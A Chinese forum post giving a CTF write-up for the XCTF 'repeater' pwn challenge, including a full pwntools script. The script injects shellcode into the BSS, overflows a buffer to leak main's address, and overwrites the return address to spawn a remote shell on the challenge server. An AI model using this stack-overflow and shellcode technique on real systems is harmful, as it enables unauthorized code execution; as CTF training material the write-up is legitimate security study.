ToB企服应用市场:ToB评测及商务社交产业平台

标题: 攻防世界 repeater 题解 [打印本页]

作者: 丝    时间: 2022-9-17 04:28
标题: 攻防世界 repeater 题解
攻防世界 repeater 题解

查看程序保护情况,开启了PIE,没开NX,RELRO全开。

在ida64中打开分析程序,这道题程序比较简单。可以发现的信息如下:

根据这些信息,这道题的思路就出来了:
这道题还是非常简单的,只是我在做的时候shellcode没选对,导致一直没利用成功(忘记改arch值)。
下面是这道题的完整代码:
  1. from pwn import *
  2. sh = remote('61.147.171.105',50187)
  3. # 通过输入name向BSS段写入shellcode
  4. context.arch = 'amd64'
  5. shellcode = asm(shellcraft.sh())
  6. sh.sendlineafter('name :',shellcode)
  7. # 通过输入内容溢出修改控制变量值,泄露main地址
  8. num = 3281697
  9. payload = b'A'*0x20 + p64(num)
  10. sh.sendlineafter('input :',payload)
  11. sh.recvuntil('you :\n0x')
  12. main_addr = int(sh.recv(12),16)
  13. # 再次通过输入内容溢出,将函数返回地址改为shellcode地址
  14. shellcode_addr = main_addr + 0x202040 - 0xa33
  15. payload2 = b'A'*0x20 + p64(0x1) + b'B'*16 + p64(shellcode_addr)
  16. sh.sendlineafter('input :',payload2)
  17. sh.interactive()
复制代码
执行结果如图:


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4